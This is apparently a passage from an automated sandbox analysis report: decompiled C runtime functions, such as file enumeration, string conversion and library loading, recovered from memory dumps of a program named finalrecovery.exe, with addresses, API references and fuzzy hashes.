													E0041E238(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E00427E4C(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E004134C4();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x43d054; // 0x8e1b5714
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0042B090(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E00419CDB(_t244 - _t287 + 1, _t287,  &_v676, E00423A98(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00423AEF( &(_v608.cFileName),  &_v640,  &_v609, E00423A98(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E0041E238(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E0041E238(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E00416560(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00423AD7);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E0041E238(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E0040EB3F(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E0041E238(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0042B050(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E0041E238( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E0041E238(_t283);
						goto L31;
					}
				} else {
					_t219 = E00413571(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00413497();
					L31:
					return _t297;
				}
				L81:
			}

0x00423bc3
0x00423bc6
0x00423bc9
0x00423bca
0x00423bcc
0x00423be2
0x00423be6
0x00423be9
0x00423beb
0x00423bed
0x00423bef
0x00423bf1
0x00423bf4
0x00423bf7
0x00423bfa
0x00423bfc
0x00423c5f
0x00423c61
0x00423c64
0x00423c66
0x00423c6a
0x00423c73
0x00423c74
0x00423c77
0x00423c79
0x00423c7c
0x00423c80
0x00423c80
0x00423c82
0x00423c84
0x00423c86
0x00423c88
0x00423c88
0x00423c8a
0x00423c8d
0x00423c90
0x00423c90
0x00423c92
0x00423c93
0x00423c93
0x00423c9e
0x00423ca0
0x00423ca3
0x00423ca4
0x00423ca7
0x00423ca7
0x00423cab
0x00423cae
0x00423cb1
0x00423cb1
0x00423cb1
0x00423cbe
0x00423cc0
0x00423cc3
0x00423cc5
0x00423cdd
0x00423ce0
0x00423ce3
0x00423ce5
0x00423ce8
0x00423cea
0x00423ced
0x00423cf0
0x00423d4d
0x00423d50
0x00423d53
0x00423d55
0x00000000
0x00423cf2
0x00423cf4
0x00423cf4
0x00423cf6
0x00423cf9
0x00423cf9
0x00423cfb
0x00423cfd
0x00423d03
0x00423d06
0x00423d06
0x00423d08
0x00423d09
0x00423d09
0x00423d10
0x00423d13
0x00423d17
0x00423d24
0x00423d29
0x00423d2c
0x00423d2e
0x00423da2
0x00423da3
0x00423da4
0x00423da5
0x00423da6
0x00423da7
0x00423dac
0x00423db0
0x00423db2
0x00423db3
0x00423db6
0x00423db6
0x00423db9
0x00423db9
0x00423dbb
0x00423dbc
0x00423dbc
0x00423dc0
0x00423dc1
0x00423dc8
0x00423dcb
0x00423dce
0x00423dd0
0x00423dd8
0x00423dd9
0x00423dda
0x00423ddd
0x00423de7
0x00423deb
0x00423ded
0x00423e01
0x00423e01
0x00423e04
0x00423e0e
0x00423e13
0x00423e16
0x00423e18
0x00000000
0x00423e1a
0x00423e1a
0x00423e1f
0x00423e26
0x00423e29
0x00423e2b
0x00423e3c
0x00423e3e
0x00423e40
0x00423e40
0x00423e40
0x00423e2d
0x00423e2e
0x00423e33
0x00423e36
0x00423e45
0x00423e4b
0x00000000
0x00423e4e
0x00423def
0x00423def
0x00423df5
0x00423dfa
0x00423dfd
0x00423dff
0x00423e51
0x00423e53
0x00423e54
0x00423e55
0x00423e56
0x00423e57
0x00423e58
0x00423e5d
0x00423e60
0x00423e61
0x00423e63
0x00423e69
0x00423e70
0x00423e73
0x00423e76
0x00423e79
0x00423e7a
0x00423e7b
0x00423e7e
0x00423e84
0x00423e86
0x00423e88
0x00423e88
0x00423e8a
0x00423e8c
0x00000000
0x00000000
0x00423e8e
0x00423e90
0x00423e92
0x00423e94
0x00423e9f
0x00423ea1
0x00423ea3
0x00000000
0x00000000
0x00423ea3
0x00423e94
0x00000000
0x00423e90
0x00423ea5
0x00423ea5
0x00423eab
0x00423ead
0x00423eb3
0x00423eb5
0x00423ed7
0x00423ed7
0x00423ed9
0x00423edb
0x00423ee7
0x00423ee7
0x00423edd
0x00423edd
0x00423edf
0x00000000
0x00423ee1
0x00423ee1
0x00423ee3
0x00423ee5
0x00000000
0x00000000
0x00423ee5
0x00423edf
0x00423eef
0x00423ef7
0x00423efd
0x00423efe
0x00423f00
0x00423f08
0x00423f0e
0x00423f14
0x00423f1a
0x00423f2e
0x00423f33
0x00423f3e
0x00423f4e
0x00423f54
0x00423f56
0x00423f59
0x00423f7c
0x00423f7c
0x00423f81
0x00423f87
0x00423f87
0x00423f8d
0x00423f93
0x00423f99
0x00423f9f
0x00423fa5
0x00423fc6
0x00423fcb
0x00423fd0
0x00423fd4
0x00423fda
0x00423fdd
0x00423ff0
0x00423ff0
0x00423ff6
0x00423ffc
0x00423ffd
0x00423ffe
0x00424003
0x00424006
0x0042400c
0x0042400e
0x0042406c
0x00424072
0x0042407a
0x0042407f
0x00424085
0x00424086
0x00000000
0x00000000
0x00000000
0x00423fdf
0x00423fdf
0x00423fe2
0x00423fe4
0x00000000
0x00423fe6
0x00423fe6
0x00423fe9
0x00000000
0x00423feb
0x00423feb
0x00423fee
0x00000000
0x00000000
0x00000000
0x00000000
0x00423fee
0x00423fe9
0x00423fe4
0x00424088
0x00424089
0x00000000
0x00424010
0x00424010
0x00424016
0x0042401e
0x00424023
0x00424032
0x00424032
0x0042403a
0x00424040
0x00424046
0x0042404d
0x00424050
0x00424052
0x00424062
0x00424067
0x00000000
0x00423f5b
0x00423f5b
0x00423f61
0x00423f62
0x00423f63
0x00423f64
0x00423f6c
0x00423f6c
0x0042408f
0x0042408f
0x00424096
0x00424097
0x0042409f
0x004240a4
0x004240a5
0x00423eb7
0x00423eb7
0x00423eba
0x00423ebc
0x00423ed1
0x00000000
0x00423ebe
0x00423ebe
0x00423ec1
0x00423ec2
0x00423ec3
0x00423ec4
0x00423ec9
0x00423ebc
0x004240aa
0x004240ab
0x004240ad
0x004240b4
0x00000000
0x00000000
0x00000000
0x00423dff
0x00423dd2
0x00423dd4
0x00423dd5
0x00423dd7
0x00423dd7
0x00000000
0x00000000
0x00000000
0x00000000
0x00423d30
0x00423d30
0x00423d36
0x00423d39
0x00423d3c
0x00423d3f
0x00423d42
0x00423d45
0x00423d48
0x00423d48
0x00000000
0x00423cf9
0x00423cc7
0x00423cc7
0x00423cca
0x00423d57
0x00423d58
0x00423d5d
0x00000000
0x00423d5d
0x00423bfe
0x00423bfe
0x00423c01
0x00423c09
0x00423c0c
0x00423c13
0x00423c15
0x00423c17
0x00423c32
0x00423c33
0x00423c34
0x00423c35
0x00423c3a
0x00423c3d
0x00423c40
0x00423c19
0x00423c19
0x00423c1c
0x00423c1d
0x00423c1e
0x00423c1f
0x00423c20
0x00423c25
0x00423c27
0x00423c2a
0x00423c2a
0x00423c42
0x00423c44
0x00000000
0x00000000
0x00423c4d
0x00423c50
0x00423c53
0x00423c55
0x00423c57
0x00000000
0x00423c59
0x00423c59
0x00423c5c
0x00000000
0x00423c5c
0x00000000
0x00423c57
0x00423cd2
0x00423d5e
0x00423d61
0x00423d65
0x00423d6e
0x00423d71
0x00423d75
0x00423d75
0x00423d77
0x00423d7a
0x00423d7c
0x00423d7e
0x00423d80
0x00423d85
0x00423d86
0x00423d8a
0x00423d8a
0x00423d8e
0x00423d91
0x00423d91
0x00423d95
0x00000000
0x00423d9c
0x00423bce
0x00423bce
0x00423bd5
0x00423bd6
0x00423bd8
0x00423d9d
0x00423da1
0x00423da1
0x00000000

APIs

_strpbrk.LIBCMT ref: 00423C0C
_free.LIBCMT ref: 00423D58

Strings

*?, xrefs: 00423C01

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction ID: 846575285fb30ed8b0b9d1186e53a9d051e6042786000a689b02c8d31ca96f1d
Opcode Fuzzy Hash: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
Instruction Fuzzy Hash: 94616F76E002299FCB14CFA9D8815EEFBF5EF48314B64816AE815F7300D739AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00424183 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424183(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00420014(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00420014(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0041353B(GetLastError());
									_t17 =  *((intOrPtr*)(E00413571(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00419D12(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0041353B(GetLastError());
						_t17 =  *((intOrPtr*)(E00413571(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00419D12(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00419D97(_a8);
				return 0;
			}

0x00424189
0x0042418e
0x004241a2
0x004241a5
0x004241d7
0x004241df
0x004241e1
0x004241fa
0x004241fd
0x00424200
0x0042420e
0x0042421d
0x00424225
0x00424227
0x00424240
0x00424243
0x00424243
0x00424229
0x00424230
0x0042423b
0x0042423b
0x00424245
0x00424246
0x00000000
0x00424246
0x00424205
0x0042420a
0x0042420c
0x00000000
0x00000000
0x00000000
0x0042420c
0x004241ea
0x004241f5
0x00000000
0x004241f5
0x004241a7
0x004241aa
0x004241ad
0x004241c0
0x004241c3
0x004241c5
0x004241c7
0x00000000
0x004241c7
0x004241b3
0x004241b8
0x004241ba
0x00000000
0x00000000
0x00000000
0x004241ba
0x00424193
0x00000000

Strings

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe, xrefs: 00424188

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
API String ID: 0-3352219999
Opcode ID: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction ID: 1c83ee6ce718a323a59e8e56696b4919b5b9745967e824b7eefe41a64fd425fc
Opcode Fuzzy Hash: 69ef0a19d16ed832991be1ac6899432db3f95619588f9b7e4da384f3d8da2b51
Instruction Fuzzy Hash: F7210771700125BF9B20AF62EC80E7B77ADEF803A8750451AF91593250E738ED818779

Uniqueness

Uniqueness Score: -1.00%

Function 100082C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100082C6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E10008D54(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E10008D54(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E10005880(GetLastError());
									_t17 =  *((intOrPtr*)(E100058B6(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E1000838D(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E10005880(GetLastError());
						_t17 =  *((intOrPtr*)(E100058B6(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E1000838D(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E100083B4(_a8);
				return 0;
			}

0x100082cc
0x100082d1
0x100082e5
0x100082e8
0x1000831a
0x10008322
0x10008324
0x1000833d
0x10008340
0x10008343
0x10008351
0x10008360
0x10008368
0x1000836a
0x10008383
0x10008386
0x10008386
0x1000836c
0x10008373
0x1000837e
0x1000837e
0x10008388
0x10008389
0x00000000
0x10008389
0x10008348
0x1000834d
0x1000834f
0x00000000
0x00000000
0x00000000
0x1000834f
0x1000832d
0x10008338
0x00000000
0x10008338
0x100082ea
0x100082ed
0x100082f0
0x10008303
0x10008306
0x10008308
0x1000830a
0x00000000
0x1000830a
0x100082f6
0x100082fb
0x100082fd
0x00000000
0x00000000
0x00000000
0x100082fd
0x100082d6
0x00000000

Strings

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe, xrefs: 100082CB

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
API String ID: 0-3352219999
Opcode ID: 91b29f99927591e2af3bde56a9630a8d6a404939b08b31975a3452a4eb3d80d5
Instruction ID: 4547eaa058a99011976ff370ab0f1f23031d39ce27107f45607d9abb19294704
Opcode Fuzzy Hash: 91b29f99927591e2af3bde56a9630a8d6a404939b08b31975a3452a4eb3d80d5
Instruction Fuzzy Hash: E9218B7560020AEFF710DF618C80A1B77ADFF806E4B158625F99497298EF31EF408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00412EF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00412EF7(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x4505f0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x42fb4c + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00416234(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00412efe
0x00412f72
0x00412f03
0x00412f05
0x00412f0c
0x00412f10
0x00412f19
0x00412f28
0x00412f31
0x00412f35
0x00412f7e
0x00412f80
0x00412f84
0x00412f87
0x00412f87
0x00412f8d
0x00412f8d
0x00412f79
0x00412f7d
0x00412f7d
0x00412f37
0x00412f40
0x00412f6a
0x00412f6d
0x00412f6f
0x00412f6f
0x00000000
0x00412f6f
0x00412f42
0x00412f4d
0x00412f52
0x00412f57
0x00000000
0x00000000
0x00412f5e
0x00412f64
0x00412f68
0x00000000
0x00000000
0x00000000
0x00412f68
0x00412f15
0x00000000
0x00000000
0x00000000
0x00412f17
0x00412f77
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00412FB8,?,?,00450598,00000000,?,004130E3,00000004,InitializeCriticalSectionEx,0042FC40,InitializeCriticalSectionEx,00000000), ref: 00412F87

Strings

api-ms-, xrefs: 00412F47

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction ID: f085532e949928cafa33473dd2a941981fdd0a3c30986f273564dbd30c8d3604
Opcode Fuzzy Hash: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
Instruction Fuzzy Hash: 3D11E331B41221ABDB324B699D44B9A73B4AF01760F550232F901E7380D7B8ED53A6DD

Uniqueness

Uniqueness Score: -1.00%

Function 10004E02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10004E02(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x10017d60 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x10010be0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10006A88(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x10004e09
0x10004e7d
0x10004e0e
0x10004e10
0x10004e17
0x10004e1b
0x10004e24
0x10004e33
0x10004e3c
0x10004e40
0x10004e89
0x10004e8b
0x10004e8f
0x10004e92
0x10004e92
0x10004e98
0x10004e98
0x10004e84
0x10004e88
0x10004e88
0x10004e42
0x10004e4b
0x10004e75
0x10004e78
0x10004e7a
0x10004e7a
0x00000000
0x10004e7a
0x10004e4d
0x10004e58
0x10004e5d
0x10004e62
0x00000000
0x00000000
0x10004e69
0x10004e6f
0x10004e73
0x00000000
0x00000000
0x00000000
0x10004e73
0x10004e20
0x00000000
0x00000000
0x00000000
0x10004e22
0x10004e82
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,10004EC3,00000000,?,00000001,00000000,?,10004F3A,00000001,FlsFree,10010C9C,FlsFree,00000000), ref: 10004E92

Strings

api-ms-, xrefs: 10004E52

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 65ff119352e348430867d9e0b4ab3439ca5bc504b167d29d587c63b2598ba15b
Instruction ID: 8f0826e2f742de8eaedcfcc59a6f9a9b2a198bd7cc29cccb56a48560d59707ab
Opcode Fuzzy Hash: 65ff119352e348430867d9e0b4ab3439ca5bc504b167d29d587c63b2598ba15b
Instruction Fuzzy Hash: 88114272A45665ABFB22DB68CC44B4936A4FB057F0F234260F954A72D4DF70ED0086D9

Uniqueness

Uniqueness Score: -1.00%

Function 00417B71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00417B71(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x42e234(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00417b77
0x00417b7b
0x00417b86
0x00417b8e
0x00417b99
0x00417b9f
0x00417ba3
0x00417baa
0x00417bb0
0x00417bb0
0x00417bb2
0x00417bb7
0x00000000
0x00417bbc
0x00417bc3

